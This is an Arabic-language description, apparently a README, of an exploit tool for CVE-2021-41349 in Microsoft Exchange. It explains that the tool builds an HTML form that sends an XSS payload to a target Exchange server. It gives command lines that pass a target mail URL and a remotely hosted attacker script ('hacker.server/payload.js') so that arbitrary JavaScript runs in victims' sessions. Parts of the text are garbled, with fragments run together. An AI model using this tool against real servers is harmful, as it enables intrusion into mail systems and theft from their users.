
أداة استغلال لثغرة CVE-2021-41349 تُنشئ نموذج HTML لتسليم حمولات XSS إلى خوادم Microsoft Exchange، مما يتيح تنفيذ JavaScript عشوائي.
استغلال: CVE-2021-41349
تقوم هذه الأداة الاستغلالية بإنشاء نموذج لإرسال حمولة XSS إلى خادم Exchange المستهدف.
تحتاج إلى إنشاء ملف js يحتوي على ما ترغب في تنفيذه.
js الخاصة بك وارفعها في مكان ما.CVE-2021-41349.py باتباع الخطوات التالية.python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
أو:
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
html إلى الخادم.